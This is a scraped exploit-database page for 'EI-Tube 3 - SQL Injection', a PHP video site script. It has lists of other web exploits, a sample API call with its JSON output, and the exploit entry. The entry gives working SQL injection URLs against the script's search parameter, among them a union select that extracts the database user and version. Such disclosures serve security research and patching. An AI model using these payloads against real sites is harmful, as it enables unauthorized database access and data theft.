Menu

Improved exploit search engine. Try it out

"EI-Tube 3 - SQL Injection"

Author

"Meisam Monsef"

Platform

php

Release date

2019-02-21

Release Date Title Type Platform Author
2019-04-22 "UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting" webapps php "Kağan EĞLENCE"
2019-04-22 "Msvod 10 - Cross-Site Request Forgery (Change User Information)" webapps php ax8
2019-04-22 "74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)" webapps php ax8
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2019-04-16 "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion" webapps php "Haboob Team"
2019-04-15 "DirectAdmin 1.561 - Multiple Vulnerabilities" webapps php InfinitumIT
2019-04-15 "CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)" remote php AkkuS
2019-04-12 "ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)" webapps php AkkuS
2019-04-10 "Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution" webapps php "Julien Ahrens"
2019-04-09 "Ashop Shopping Cart Software - 'bannedcustomers.php?blacklistitemid' SQL Injection" webapps php "Doğukan Karaciğer"
2019-02-27 "PHP 7.2 - 'imagecolormatch()' Out of Band Heap Write" remote php cfreal
2019-04-08 "WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass" webapps php isdampe
2019-04-08 "Tradebox CryptoCurrency - 'symbol' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-08 "ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities" webapps php Ramikan
2019-04-08 "Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution" webapps php FelipeGaspar
2019-04-08 "Jobgator - 'experience' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-05 "WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery" webapps php "Peyman Forouzan"
2019-04-05 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)" remote php Metasploit
2019-04-04 "FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)" webapps php "Yilmaz Degirmenci"
2019-04-03 "PhreeBooks ERP 5.2.3 - Arbitrary File Upload" webapps php "Abdullah Çelebi"
2019-04-03 "Ashop Shopping Cart Software - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "Clinic Pro v4 - 'month' SQL Injection" webapps php "Abdullah Çelebi"
2019-04-03 "iScripts ReserveLogic - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)" remote php AkkuS
2019-04-02 "phpFileManager 1.7.8 - Local File Inclusion" webapps php "Murat Kalafatoglu"
2019-04-02 "Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting" webapps php "Mr Winst0n"
2019-04-02 "CMS Made Simple < 2.2.10 - SQL Injection" webapps php "Daniele Scanu"
2019-04-02 "LimeSurvey < 3.16 - Remote Code Execution" webapps php q3rv0
2019-04-02 "WordPress Plugin PayPal Checkout Payment Gateway 1.6.8 - Parameter Tampering" webapps php "Vikas Chaudhary"
2019-04-02 "Inout RealEstate - 'city' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
Release Date Title Type Platform Author
2019-02-21 "EI-Tube 3 - SQL Injection" webapps php "Meisam Monsef"
2018-10-29 "MTGAS MOGG Web Simulator Script - SQL Injection" webapps php "Meisam Monsef"
2018-05-27 "Lyrist - 'id' SQL Injection" webapps php "Meisam Monsef"
2018-05-27 "Ingenious School Management System - 'id' SQL Injection" webapps php "Meisam Monsef"
2017-10-04 "ClipBucket 2.8.3 - Remote Code Execution" webapps php "Meisam Monsef"
2017-08-02 "Entrepreneur B2B Script - 'pid' SQL Injection" webapps php "Meisam Monsef"
2016-07-19 "newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure" webapps php "Meisam Monsef"
2016-07-19 "NewsP Free News Script 1.4.7 - User Credentials Disclosure" webapps php "Meisam Monsef"
2016-07-08 "PHP Real Estate Script 3 - Arbitrary File Disclosure" webapps php "Meisam Monsef"
2016-06-23 "Alibaba Clone B2B Script - Arbitrary File Disclosure" webapps php "Meisam Monsef"
2016-05-30 "Open Source Real Estate Script 3.6.0 - SQL Injection" webapps php "Meisam Monsef"
2016-05-27 "PHP Realestate Script Script 4.9.0 - SQL Injection" webapps php "Meisam Monsef"
2016-05-04 "Alibaba Clone B2B Script - Admin Authentication Bypass" webapps php "Meisam Monsef"
2015-08-15 "Security IP Camera Star Vision DVR - Authentication Bypass" webapps hardware "Meisam Monsef"
2015-08-07 "PHP News Script 4.0.0 - SQL Injection" webapps php "Meisam Monsef"
2015-09-02 "SphereFTP Server 2.0 - Crash (PoC)" dos windows "Meisam Monsef"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46440/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46440/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46440/40903/ei-tube-3-sql-injection/download/", "exploit_id": "46440", "exploit_description": "\"EI-Tube 3 - SQL Injection\"", "exploit_date": "2019-02-21", "exploit_author": "\"Meisam Monsef\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# Exploit Title: PHP EI-Tube Script - Sql Injection
# Date: 2019-02-21
# Exploit Author: Meisam Monsef - meisamrce@gmail.com
# Vendor Homepage: https://codecanyon.net/item/eitube-youtube-api-v3-site-builder/22722912?s_rank=17
# Version: 3
# Tested on: ubuntu
# special thanks : Alireza Noorkazemi - A-H - Akhzari -
# Net Hunter (Pouya) - M.Azizi - EBI -Navid - Shahab RA - SAM.SH
# M.I - Nikavar - Hosseini
# very special thanks : esecurity.ir

Exploit:
https://target/search?q=-999%22+[sql+command]+%23
https://target/search?q=-999%22+union+select+1,user(),3,4,5,version()+%23